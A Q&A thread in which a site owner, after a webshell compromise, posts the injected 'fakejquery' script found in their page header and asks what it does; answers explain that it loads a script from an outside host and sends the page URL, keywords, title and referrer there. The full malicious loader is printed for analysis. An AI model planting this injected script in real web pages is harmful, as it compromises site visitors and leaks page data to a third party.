Website hacking with a script that references another site

Navigation
47

Recently my site was hacked, the attackers managed to upload a webshell to the site, however everything was controlled and the site is safe again.

Now eset nod32 I detected a trojan fakejquery , investigating a bit I could see that in the header of the page the following script has been inserted: 

<script>
    var a = '';
    setTimeout(1);

    function setCookie(a, b, c) {
        var d = new Date;
        d.setTime(d.getTime() + 60 * c * 60 * 1e3);
        var e = "expires=" + d.toUTCString();
        document.cookie = a + "=" + b + "; " + e
    }

    function getCookie(a) {
        for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c
            .length; d++) {
            for (var e = c[d];
                " " == e.charAt(0);) e = e.substring(1);
            if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
        }
        return null
    }
    null == getCookie("__cfgoid") && (setCookie("__cfgoid", 1, 1), 1 ==
        getCookie("__cfgoid") && (setCookie("__cfgoid", 2, 1), document.write(
            '<script type="text/javascript" src="' +
            'http://crazytime.home.pl/js/jquery.min.php' + '?key=b64' +
            '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host +
            '&utm_medium=' + '&utm_content=' + window.location +
            '&utm_term=' + encodeURIComponent(
                ((k = (function() {
                        var keywords = '';
                        var metas = document.getElementsByTagName('meta');
                        if (metas) {
                            for (var x = 0, y = metas.length; x < y; x++) {
                                if (metas[x].name.toLowerCase() == "keywords") {
                                    keywords += metas[x].content;
                                }
                            }
                        }
                        return keywords !== '' ? keywords : null;
                    })()) == null ? (v = window.location.search.match(
                        /utm_term=([^&]+)/)) == null ? (t = document.title) == null ?
                    '' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(
                document.referrer) + '"><' + '/script>')));
</script>

From what I understand the previous script is generating traffic to an external site.

I've already removed all this code from the site, but I'm left wondering what this code really does.

My question is: Am I right in thinking that traffic is being generated to an external site, or does the code shared above do something extra?

    
asked by Juan Pinzón 17.10.2016 в 23:59
source

3 answers

56

You have been a victim of Black Hat SEO and I think more specifically the technique Spamming Keywords which consists of filling the content of a website with keywords spamming said content. This is also known as Keyword stuffing or Spamdexing .

All these techniques aim to alter the ranking of the site in the search engines and this is a double-edged sword because the search engines have tools to detect such spam and can remove your page from the ranking as a result.

  

Many search engines check for spamdexing and remove suspicious pages from their indexes.

This part 

document.write('<script type="text/javascript" src="' +

     /**** Esta es la url a donde va el tráfico ***/

     'http://crazytime.home.pl/js/jquery.min.php' + 

     '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' +
      window.location.host + '&utm_medium=' + '&utm_content=' + 
      window.location + '&utm_term=' ..........

You are creating a script that will try to load an external page and is using the keywords and even the title of your own page to pass them by parameters in the query

This fragment proves it 

var k = (function() {
  var keywords = '';
  var metas = document.getElementsByTagName('meta');
  if (metas) {
    for (var x = 0, y = metas.length; x < y; x++) {
      if (metas[x].name.toLowerCase() == "keywords") {
        keywords += metas[x].content;
      }
    }
  }
  return keywords !== '' ? keywords : null;
})();

console.log(k);
<!DOCTYPE html>
<html>

<head>
  <meta name="keywords" content="hello world">
  <meta name="keywords" content="hola mundo">
</head>

<body>

</body>

</html>

You are also reading the referrer of your page and sending it 

'&se_referrer=' + encodeURIComponent(document.referrer);

Finally, and most importantly, you are storing cookies ("__ cfgoid") in the browsers of people who use your site. 

function setCookie(a, b, c) {
  var d = new Date;
  d.setTime(d.getTime() + 60 * c * 60 * 1e3);
  var e = "expires=" + d.toUTCString();
  document.cookie = a + "=" + b + "; " + e
}

I recommend that, now that you contain the threat, write your other script to clean the cookie.

    
answered by 18.10.2016 / 00:44
source
17

Use this: link It will serve you to scan malicious files and URLs that create malware or unsafe things.

The funny thing is that the URL has already been analyzed, initially it has sent me:

  

URL already analyzed

     

This URL was last analyzed by VirusTotal on 2016-01-01 07:12:28 UTC,   it was first analyzed by VirusTotal on 2016-01-01 07:12:28 UTC.

     

Detection ratio: 0/66

     

You can take a look at the last analysis or analyze it again.

However when analyzing again: 

URL:    http://crazytime.home.pl/js/jquery.min.php
Detection ratio:    1 / 68
Analysis date:  2016-10-17 22:27:58 UTC ( 0 minutes ago )
File scan:  Go to downloaded file analysis

Result:

link

Now, on the other hand, in the public_html have this utility at hand: link

    
answered by 18.10.2016 в 00:32
2

The attack you suffered is that they uploaded a PHP file and send the traffic of your website to third parties of advertising or others, which I recommend you check all the permissions of the folders of your server to verify that some folder is with writing service, that there are uploading files there, and from there they carry out the attack, it happened to me once on hack facebook without programs and good I had to set all the permissions of my server. And if I had problems with the permits, that's why I tell you that you start there.

    
answered by 09.02.2017 в 23:55
Work with dp on Android How to make my input text have a separator of thousands and decimals in jquery?